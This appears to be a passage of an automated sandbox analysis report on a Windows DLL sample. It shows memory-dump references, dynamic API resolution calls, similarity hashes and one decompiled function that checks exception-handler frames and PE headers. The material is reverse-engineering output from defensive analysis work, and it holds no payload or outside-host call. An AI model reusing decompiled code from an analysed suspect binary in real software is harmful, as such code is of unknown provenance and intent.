                                                                                                                                                                                                                                                          0x6ddf1fb8
                                                                                                                                                                                                                                                          0x6ddf1fb8
                                                                                                                                                                                                                                                          0x6ddf1fb8
                                                                                                                                                                                                                                                          0x6ddf1fc7
                                                                                                                                                                                                                                                          0x6ddf1fca
                                                                                                                                                                                                                                                          0x6ddf1fcc
                                                                                                                                                                                                                                                          0x6ddf1fd3
                                                                                                                                                                                                                                                          0x6ddf1fce
                                                                                                                                                                                                                                                          0x6ddf1fce
                                                                                                                                                                                                                                                          0x6ddf1fce
                                                                                                                                                                                                                                                          0x6ddf1fdb
                                                                                                                                                                                                                                                          0x6ddf1fe1
                                                                                                                                                                                                                                                          0x6ddf1fe3
                                                                                                                                                                                                                                                          0x6ddf2013
                                                                                                                                                                                                                                                          0x6ddf1fe5
                                                                                                                                                                                                                                                          0x6ddf1fe5
                                                                                                                                                                                                                                                          0x6ddf1fe8
                                                                                                                                                                                                                                                          0x6ddf1fea
                                                                                                                                                                                                                                                          0x6ddf1ff2
                                                                                                                                                                                                                                                          0x6ddf1ff2
                                                                                                                                                                                                                                                          0x6ddf1ff7
                                                                                                                                                                                                                                                          0x6ddf1ff9
                                                                                                                                                                                                                                                          0x6ddf2000
                                                                                                                                                                                                                                                          0x6ddf2002
                                                                                                                                                                                                                                                          0x6ddf2002
                                                                                                                                                                                                                                                          0x6ddf2002
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf2002
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf1fe3
                                                                                                                                                                                                                                                          0x6ddf1f92
                                                                                                                                                                                                                                                          0x6ddf1f94
                                                                                                                                                                                                                                                          0x6ddf1f96
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf1f96
                                                                                                                                                                                                                                                          0x6ddf2016
                                                                                                                                                                                                                                                          0x6ddf2016
                                                                                                                                                                                                                                                          0x6ddf201d
                                                                                                                                                                                                                                                          0x6ddf2022
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf2028
                                                                                                                                                                                                                                                          0x6ddf2033
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf2033
                                                                                                                                                                                                                                                          0x6ddf202a
                                                                                                                                                                                                                                                          0x6ddf202a
                                                                                                                                                                                                                                                          0x6ddf2030
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf2030
                                                                                                                                                                                                                                                          0x6ddf1f5e
                                                                                                                                                                                                                                                          0x6ddf2034
                                                                                                                                                                                                                                                          0x6ddf2039

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(?,?,00000000,?,?), ref: 6DDF1F69
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 6DDF1FDB
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.480776328.000000006DDF1000.00000020.00020000.sdmp, Offset: 6DDF0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.480766161.000000006DDF0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.480789489.000000006DDF3000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.480806564.000000006DDF5000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.480822787.000000006DDF6000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2574300362-0
                                                                                                                                                                                                                                                          • Opcode ID: d4dc5c3f74822da85d78b6570ec414cdedd194a8111c01e24127058ce7d4e4e3
                                                                                                                                                                                                                                                          • Instruction ID: 18b74a089d3a3b4918d4428df59c062da75bdaa229aacd1b6d392ed7fc47469e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d4dc5c3f74822da85d78b6570ec414cdedd194a8111c01e24127058ce7d4e4e3
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3B3159B2A40206DFEB14DF59C880BAEBBF4FF45308F12406AE855EB241E774DA46CB51
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6DE47670,?,?,00000008,?,?,6DE47308,00000000), ref: 6DE478A2
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.480847800.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ExceptionRaise
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3997070919-0
                                                                                                                                                                                                                                                          • Opcode ID: 73812f5af2742b36efae113d391498c6e045b4e9e581e7c75ee6a0b3425959e3
                                                                                                                                                                                                                                                          • Instruction ID: a77a086a1dea4c68e317ae659058ca07cc5f6af367ad5d95e626bbbd2aecd70c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 73812f5af2742b36efae113d391498c6e045b4e9e581e7c75ee6a0b3425959e3
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CFB18C31A206098FD705DF28D486B657BA0FF05369F25C658E9A9DF3A1C735E982CBC0
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                          			E6DDF2485(long _a4) {
                                                                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                                                                          				signed int _v16;
                                                                                                                                                                                                                                                          				short* _v32;
                                                                                                                                                                                                                                                          				void _v36;
                                                                                                                                                                                                                                                          				void* _t57;
                                                                                                                                                                                                                                                          				signed int _t58;
                                                                                                                                                                                                                                                          				signed int _t61;
                                                                                                                                                                                                                                                          				signed int _t62;
                                                                                                                                                                                                                                                          				void* _t63;
                                                                                                                                                                                                                                                          				signed int* _t68;
                                                                                                                                                                                                                                                          				intOrPtr* _t69;
                                                                                                                                                                                                                                                          				intOrPtr* _t71;
                                                                                                                                                                                                                                                          				intOrPtr _t72;
                                                                                                                                                                                                                                                          				intOrPtr _t75;
                                                                                                                                                                                                                                                          				void* _t76;
                                                                                                                                                                                                                                                          				signed int _t77;
                                                                                                                                                                                                                                                          				void* _t78;
                                                                                                                                                                                                                                                          				void _t80;
                                                                                                                                                                                                                                                          				signed int _t81;
                                                                                                                                                                                                                                                          				signed int _t84;
                                                                                                                                                                                                                                                          				signed int _t86;
                                                                                                                                                                                                                                                          				short* _t87;
                                                                                                                                                                                                                                                          				void* _t89;
                                                                                                                                                                                                                                                          				signed int* _t90;
                                                                                                                                                                                                                                                          				long _t91;
                                                                                                                                                                                                                                                          				signed int _t93;
                                                                                                                                                                                                                                                          				signed int _t94;
                                                                                                                                                                                                                                                          				signed int _t100;
                                                                                                                                                                                                                                                          				signed int _t102;
                                                                                                                                                                                                                                                          				void* _t104;
                                                                                                                                                                                                                                                          				long _t108;
                                                                                                                                                                                                                                                          				signed int _t110;
                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                          				_t108 = _a4;
                                                                                                                                                                                                                                                          				_t76 =  *(_t108 + 8);
                                                                                                                                                                                                                                                          				if((_t76 & 0x00000003) != 0) {
                                                                                                                                                                                                                                                          					L3:
                                                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                          				_a4 =  *[fs:0x4];
                                                                                                                                                                                                                                                          				_v8 =  *[fs:0x8];
                                                                                                                                                                                                                                                          				if(_t76 < _v8 || _t76 >= _a4) {
                                                                                                                                                                                                                                                          					_t102 =  *(_t108 + 0xc);
                                                                                                                                                                                                                                                          					__eflags = _t102 - 0xffffffff;
                                                                                                                                                                                                                                                          					if(_t102 != 0xffffffff) {
                                                                                                                                                                                                                                                          						_t91 = 0;
                                                                                                                                                                                                                                                          						__eflags = 0;
                                                                                                                                                                                                                                                          						_a4 = 0;
                                                                                                                                                                                                                                                          						_t57 = _t76;
                                                                                                                                                                                                                                                          						do {
                                                                                                                                                                                                                                                          							_t80 =  *_t57;
                                                                                                                                                                                                                                                          							__eflags = _t80 - 0xffffffff;
                                                                                                                                                                                                                                                          							if(_t80 == 0xffffffff) {
                                                                                                                                                                                                                                                          								goto L9;
                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                          							__eflags = _t80 - _t91;
                                                                                                                                                                                                                                                          							if(_t80 >= _t91) {
                                                                                                                                                                                                                                                          								L20:
                                                                                                                                                                                                                                                          								_t63 = 0;
                                                                                                                                                                                                                                                          								L60:
                                                                                                                                                                                                                                                          								return _t63;
                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                          							L9:
                                                                                                                                                                                                                                                          							__eflags =  *(_t57 + 4);
                                                                                                                                                                                                                                                          							if( *(_t57 + 4) != 0) {
                                                                                                                                                                                                                                                          								_t12 =  &_a4;
                                                                                                                                                                                                                                                          								 *_t12 = _a4 + 1;
                                                                                                                                                                                                                                                          								__eflags =  *_t12;
                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                          							_t91 = _t91 + 1;
                                                                                                                                                                                                                                                          							_t57 = _t57 + 0xc;
                                                                                                                                                                                                                                                          							__eflags = _t91 - _t102;
                                                                                                                                                                                                                                                          						} while (_t91 <= _t102);
                                                                                                                                                                                                                                                          						__eflags = _a4;
                                                                                                                                                                                                                                                          						if(_a4 == 0) {
                                                                                                                                                                                                                                                          							L15:
                                                                                                                                                                                                                                                          							_t81 =  *0x6ddf41f8;
                                                                                                                                                                                                                                                          							_t110 = _t76 & 0xfffff000;
                                                                                                                                                                                                                                                          							_t58 = 0;
                                                                                                                                                                                                                                                          							__eflags = _t81;
                                                                                                                                                                                                                                                          							if(_t81 <= 0) {
                                                                                                                                                                                                                                                          								L18:
                                                                                                                                                                                                                                                          								_t104 = _t102 | 0xffffffff;
                                                                                                                                                                                                                                                          								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                                                                                                                                                                                                                                                          								__eflags = _t61;
                                                                                                                                                                                                                                                          								if(_t61 < 0) {
                                                                                                                                                                                                                                                          									_t62 = 0;
                                                                                                                                                                                                                                                          									__eflags = 0;
                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                          									_t62 = _a4;
                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                          								__eflags = _t62;
                                                                                                                                                                                                                                                          								if(_t62 == 0) {
                                                                                                                                                                                                                                                          									L59:
                                                                                                                                                                                                                                                          									_t63 = _t104;
                                                                                                                                                                                                                                                          									goto L60;
                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                          									__eflags = _v12 - 0x1000000;
                                                                                                                                                                                                                                                          									if(_v12 != 0x1000000) {
                                                                                                                                                                                                                                                          										goto L59;
                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                          									__eflags = _v16 & 0x000000cc;
                                                                                                                                                                                                                                                          									if((_v16 & 0x000000cc) == 0) {
                                                                                                                                                                                                                                                          										L46:
                                                                                                                                                                                                                                                          										_t63 = 1;
                                                                                                                                                                                                                                                          										 *0x6ddf4240 = 1;
                                                                                                                                                                                                                                                          										__eflags =  *0x6ddf4240;
                                                                                                                                                                                                                                                          										if( *0x6ddf4240 != 0) {
                                                                                                                                                                                                                                                          											goto L60;
                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                          										_t84 =  *0x6ddf41f8;
                                                                                                                                                                                                                                                          										__eflags = _t84;
                                                                                                                                                                                                                                                          										_t93 = _t84;
                                                                                                                                                                                                                                                          										if(_t84 <= 0) {
                                                                                                                                                                                                                                                          											L51:
                                                                                                                                                                                                                                                          											__eflags = _t93;
                                                                                                                                                                                                                                                          											if(_t93 != 0) {
                                                                                                                                                                                                                                                          												L58:
                                                                                                                                                                                                                                                          												 *0x6ddf4240 = 0;
                                                                                                                                                                                                                                                          												goto L5;
                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                          											_t77 = 0xf;
                                                                                                                                                                                                                                                          											__eflags = _t84 - _t77;
                                                                                                                                                                                                                                                          											if(_t84 <= _t77) {
                                                                                                                                                                                                                                                          												_t77 = _t84;
                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                          											_t94 = 0;
                                                                                                                                                                                                                                                          											__eflags = _t77;
                                                                                                                                                                                                                                                          											if(_t77 < 0) {
                                                                                                                                                                                                                                                          												L56:
                                                                                                                                                                                                                                                          												__eflags = _t84 - 0x10;
                                                                                                                                                                                                                                                          												if(_t84 < 0x10) {
                                                                                                                                                                                                                                                          													_t86 = _t84 + 1;
                                                                                                                                                                                                                                                          													__eflags = _t86;
                                                                                                                                                                                                                                                          													 *0x6ddf41f8 = _t86;
                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                          												goto L58;
                                                                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                                                                          												do {
                                                                                                                                                                                                                                                          													_t68 = 0x6ddf4200 + _t94 * 4;
                                                                                                                                                                                                                                                          													_t94 = _t94 + 1;
                                                                                                                                                                                                                                                          													__eflags = _t94 - _t77;
                                                                                                                                                                                                                                                          													 *_t68 = _t110;
                                                                                                                                                                                                                                                          													_t110 =  *_t68;
                                                                                                                                                                                                                                                          												} while (_t94 <= _t77);
                                                                                                                                                                                                                                                          												goto L56;
                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                          										_t69 = 0x6ddf41fc + _t84 * 4;
                                                                                                                                                                                                                                                          										while(1) {
                                                                                                                                                                                                                                                          											__eflags =  *_t69 - _t110;
                                                                                                                                                                                                                                                          											if( *_t69 == _t110) {
                                                                                                                                                                                                                                                          												goto L51;
                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                          											_t93 = _t93 - 1;
                                                                                                                                                                                                                                                          											_t69 = _t69 - 4;
                                                                                                                                                                                                                                                          											__eflags = _t93;
                                                                                                                                                                                                                                                          											if(_t93 > 0) {
                                                                                                                                                                                                                                                          												continue;
                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                          											goto L51;
                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                          										goto L51;
                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                          									_t87 = _v32;
                                                                                                                                                                                                                                                          									__eflags =  *_t87 - 0x5a4d;
                                                                                                                                                                                                                                                          									if( *_t87 != 0x5a4d) {
                                                                                                                                                                                                                                                          										goto L59;
                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                          									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                                                                                                                                                                                                                                                          									__eflags =  *_t71 - 0x4550;
                                                                                                                                                                                                                                                          									if( *_t71 != 0x4550) {
                                                                                                                                                                                                                                                          										goto L59;
                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                          									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                                                                                                                                                                                                                                                          									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                                                                                                                                                                                                                                                          										goto L59;
                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                          									_t78 = _t76 - _t87;
                                                                                                                                                                                                                                                          									__eflags =  *((short*)(_t71 + 6));
                                                                                                                                                                                                                                                          									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                                                                                                                                                                                                                                                          									if( *((short*)(_t71 + 6)) <= 0) {
                                                                                                                                                                                                                                                          										goto L59;
                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                          									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                                                                                                                                                                                                                                                          									__eflags = _t78 - _t72;
                                                                                                                                                                                                                                                          									if(_t78 < _t72) {
                                                                                                                                                                                                                                                          										goto L46;
                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                          									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                                                                                                                                                                                                                                                          									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                                                                                                                                                                                                                                                          										goto L46;
                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                          									__eflags =  *(_t89 + 0x27) & 0x00000080;
                                                                                                                                                                                                                                                          									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                                                                                                                                                                                                                                                          										goto L20;
                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                          									goto L46;
                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                          								goto L16;
                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                          							while(1) {
                                                                                                                                                                                                                                                          								L16:
                                                                                                                                                                                                                                                          								__eflags =  *((intOrPtr*)(0x6ddf4200 + _t58 * 4)) - _t110;
                                                                                                                                                                                                                                                          								if( *((intOrPtr*)(0x6ddf4200 + _t58 * 4)) == _t110) {
                                                                                                                                                                                                                                                          									break;
                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                          								_t58 = _t58 + 1;
                                                                                                                                                                                                                                                          								__eflags = _t58 - _t81;
                                                                                                                                                                                                                                                          								if(_t58 < _t81) {
                                                                                                                                                                                                                                                          									continue;
                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                          								goto L18;
                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                          							__eflags = _t58;
                                                                                                                                                                                                                                                          							if(_t58 <= 0) {
                                                                                                                                                                                                                                                          								goto L5;
                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                          							 *0x6ddf4240 = 1;
                                                                                                                                                                                                                                                          							__eflags =  *0x6ddf4240;
                                                                                                                                                                                                                                                          							if( *0x6ddf4240 != 0) {
                                                                                                                                                                                                                                                          								goto L5;
                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                          							__eflags =  *((intOrPtr*)(0x6ddf4200 + _t58 * 4)) - _t110;
                                                                                                                                                                                                                                                          							if( *((intOrPtr*)(0x6ddf4200 + _t58 * 4)) == _t110) {
                                                                                                                                                                                                                                                          								L32:
                                                                                                                                                                                                                                                          								_t100 = 0;
                                                                                                                                                                                                                                                          								__eflags = _t58;
                                                                                                                                                                                                                                                          								if(_t58 < 0) {
                                                                                                                                                                                                                                                          									L34:
                                                                                                                                                                                                                                                          									 *0x6ddf4240 = 0;
                                                                                                                                                                                                                                                          									goto L5;
                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                          									goto L33;
                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                          								do {
                                                                                                                                                                                                                                                          									L33:
                                                                                                                                                                                                                                                          									_t90 = 0x6ddf4200 + _t100 * 4;
                                                                                                                                                                                                                                                          									_t100 = _t100 + 1;
                                                                                                                                                                                                                                                          									__eflags = _t100 - _t58;
                                                                                                                                                                                                                                                          									 *_t90 = _t110;
                                                                                                                                                                                                                                                          									_t110 =  *_t90;
                                                                                                                                                                                                                                                          								} while (_t100 <= _t58);
                                                                                                                                                                                                                                                          								goto L34;
                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                          							_t58 = _t81 - 1;
                                                                                                                                                                                                                                                          							__eflags = _t58;
                                                                                                                                                                                                                                                          							if(_t58 < 0) {
                                                                                                                                                                                                                                                          								L28:
                                                                                                                                                                                                                                                          								__eflags = _t81 - 0x10;
                                                                                                                                                                                                                                                          								if(_t81 < 0x10) {
                                                                                                                                                                                                                                                          									_t81 = _t81 + 1;
                                                                                                                                                                                                                                                          									__eflags = _t81;
                                                                                                                                                                                                                                                          									 *0x6ddf41f8 = _t81;
                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                          								_t58 = _t81 - 1;
                                                                                                                                                                                                                                                          								goto L32;
                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                          								goto L25;
                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                          							while(1) {
                                                                                                                                                                                                                                                          								L25:
                                                                                                                                                                                                                                                          								__eflags =  *((intOrPtr*)(0x6ddf4200 + _t58 * 4)) - _t110;
                                                                                                                                                                                                                                                          								if( *((intOrPtr*)(0x6ddf4200 + _t58 * 4)) == _t110) {
                                                                                                                                                                                                                                                          									break;
                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                          								_t58 = _t58 - 1;
                                                                                                                                                                                                                                                          								__eflags = _t58;
                                                                                                                                                                                                                                                          								if(_t58 >= 0) {
                                                                                                                                                                                                                                                          									continue;
                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                          								break;
                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                          							__eflags = _t58;
                                                                                                                                                                                                                                                          							if(__eflags >= 0) {
                                                                                                                                                                                                                                                          								if(__eflags == 0) {
                                                                                                                                                                                                                                                          									goto L34;
                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                          								goto L32;
                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                          							goto L28;
                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                          						_t75 =  *((intOrPtr*)(_t108 - 8));
                                                                                                                                                                                                                                                          						__eflags = _t75 - _v8;
                                                                                                                                                                                                                                                          						if(_t75 < _v8) {
                                                                                                                                                                                                                                                          							goto L20;
                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                          						__eflags = _t75 - _t108;
                                                                                                                                                                                                                                                          						if(_t75 >= _t108) {
                                                                                                                                                                                                                                                          							goto L20;
                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                          						goto L15;
                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                          					L5:
                                                                                                                                                                                                                                                          					_t63 = 1;
                                                                                                                                                                                                                                                          					goto L60;
                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                          					goto L3;
                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                          			}




































                                                                                                                                                                                                                                                          0x6ddf248f
                                                                                                                                                                                                                                                          0x6ddf2492
                                                                                                                                                                                                                                                          0x6ddf2498
                                                                                                                                                                                                                                                          0x6ddf24b6
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf24b6
                                                                                                                                                                                                                                                          0x6ddf24a0
                                                                                                                                                                                                                                                          0x6ddf24a9
                                                                                                                                                                                                                                                          0x6ddf24af
                                                                                                                                                                                                                                                          0x6ddf24be
                                                                                                                                                                                                                                                          0x6ddf24c1
                                                                                                                                                                                                                                                          0x6ddf24c4
                                                                                                                                                                                                                                                          0x6ddf24ce
                                                                                                                                                                                                                                                          0x6ddf24ce
                                                                                                                                                                                                                                                          0x6ddf24d0
                                                                                                                                                                                                                                                          0x6ddf24d3
                                                                                                                                                                                                                                                          0x6ddf24d5
                                                                                                                                                                                                                                                          0x6ddf24d5
                                                                                                                                                                                                                                                          0x6ddf24d7
                                                                                                                                                                                                                                                          0x6ddf24da
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf24dc
                                                                                                                                                                                                                                                          0x6ddf24de
                                                                                                                                                                                                                                                          0x6ddf2544
                                                                                                                                                                                                                                                          0x6ddf2544
                                                                                                                                                                                                                                                          0x6ddf26a2
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf26a2
                                                                                                                                                                                                                                                          0x6ddf24e0
                                                                                                                                                                                                                                                          0x6ddf24e0
                                                                                                                                                                                                                                                          0x6ddf24e4
                                                                                                                                                                                                                                                          0x6ddf24e6
                                                                                                                                                                                                                                                          0x6ddf24e6
                                                                                                                                                                                                                                                          0x6ddf24e6
                                                                                                                                                                                                                                                          0x6ddf24e6
                                                                                                                                                                                                                                                          0x6ddf24e9
                                                                                                                                                                                                                                                          0x6ddf24ea
                                                                                                                                                                                                                                                          0x6ddf24ed
                                                                                                                                                                                                                                                          0x6ddf24ed
                                                                                                                                                                                                                                                          0x6ddf24f1
                                                                                                                                                                                                                                                          0x6ddf24f5
                                                                                                                                                                                                                                                          0x6ddf2503
                                                                                                                                                                                                                                                          0x6ddf2503
                                                                                                                                                                                                                                                          0x6ddf250b
                                                                                                                                                                                                                                                          0x6ddf2511
                                                                                                                                                                                                                                                          0x6ddf2513
                                                                                                                                                                                                                                                          0x6ddf2515
                                                                                                                                                                                                                                                          0x6ddf2525
                                                                                                                                                                                                                                                          0x6ddf2532
                                                                                                                                                                                                                                                          0x6ddf2536
                                                                                                                                                                                                                                                          0x6ddf253b
                                                                                                                                                                                                                                                          0x6ddf253d
                                                                                                                                                                                                                                                          0x6ddf25bb
                                                                                                                                                                                                                                                          0x6ddf25bb
                                                                                                                                                                                                                                                          0x6ddf253f
                                                                                                                                                                                                                                                          0x6ddf253f
                                                                                                                                                                                                                                                          0x6ddf253f
                                                                                                                                                                                                                                                          0x6ddf25bd
                                                                                                                                                                                                                                                          0x6ddf25bf
                                                                                                                                                                                                                                                          0x6ddf26a0
                                                                                                                                                                                                                                                          0x6ddf26a0
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf25c5
                                                                                                                                                                                                                                                          0x6ddf25c5
                                                                                                                                                                                                                                                          0x6ddf25cc
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf25d2
                                                                                                                                                                                                                                                          0x6ddf25d6
                                                                                                                                                                                                                                                          0x6ddf2632
                                                                                                                                                                                                                                                          0x6ddf2634
                                                                                                                                                                                                                                                          0x6ddf263c
                                                                                                                                                                                                                                                          0x6ddf263e
                                                                                                                                                                                                                                                          0x6ddf2640
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf2642
                                                                                                                                                                                                                                                          0x6ddf2648
                                                                                                                                                                                                                                                          0x6ddf264a
                                                                                                                                                                                                                                                          0x6ddf264c
                                                                                                                                                                                                                                                          0x6ddf2661
                                                                                                                                                                                                                                                          0x6ddf2661
                                                                                                                                                                                                                                                          0x6ddf2663
                                                                                                                                                                                                                                                          0x6ddf2692
                                                                                                                                                                                                                                                          0x6ddf2699
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf2699
                                                                                                                                                                                                                                                          0x6ddf2667
                                                                                                                                                                                                                                                          0x6ddf2668
                                                                                                                                                                                                                                                          0x6ddf266a
                                                                                                                                                                                                                                                          0x6ddf266c
                                                                                                                                                                                                                                                          0x6ddf266c
                                                                                                                                                                                                                                                          0x6ddf266e
                                                                                                                                                                                                                                                          0x6ddf2670
                                                                                                                                                                                                                                                          0x6ddf2672
                                                                                                                                                                                                                                                          0x6ddf2686
                                                                                                                                                                                                                                                          0x6ddf2686
                                                                                                                                                                                                                                                          0x6ddf2689
                                                                                                                                                                                                                                                          0x6ddf268b
                                                                                                                                                                                                                                                          0x6ddf268b
                                                                                                                                                                                                                                                          0x6ddf268c
                                                                                                                                                                                                                                                          0x6ddf268c
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf2674
                                                                                                                                                                                                                                                          0x6ddf2674
                                                                                                                                                                                                                                                          0x6ddf2674
                                                                                                                                                                                                                                                          0x6ddf267d
                                                                                                                                                                                                                                                          0x6ddf267e
                                                                                                                                                                                                                                                          0x6ddf2680
                                                                                                                                                                                                                                                          0x6ddf2682
                                                                                                                                                                                                                                                          0x6ddf2682
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf2674
                                                                                                                                                                                                                                                          0x6ddf2672
                                                                                                                                                                                                                                                          0x6ddf264e
                                                                                                                                                                                                                                                          0x6ddf2655
                                                                                                                                                                                                                                                          0x6ddf2655
                                                                                                                                                                                                                                                          0x6ddf2657
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf2659
                                                                                                                                                                                                                                                          0x6ddf265a
                                                                                                                                                                                                                                                          0x6ddf265d
                                                                                                                                                                                                                                                          0x6ddf265f
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf265f
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf2655
                                                                                                                                                                                                                                                          0x6ddf25d8
                                                                                                                                                                                                                                                          0x6ddf25db
                                                                                                                                                                                                                                                          0x6ddf25e0
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf25e9
                                                                                                                                                                                                                                                          0x6ddf25eb
                                                                                                                                                                                                                                                          0x6ddf25f1
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf25f7
                                                                                                                                                                                                                                                          0x6ddf25fd
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf2603
                                                                                                                                                                                                                                                          0x6ddf2605
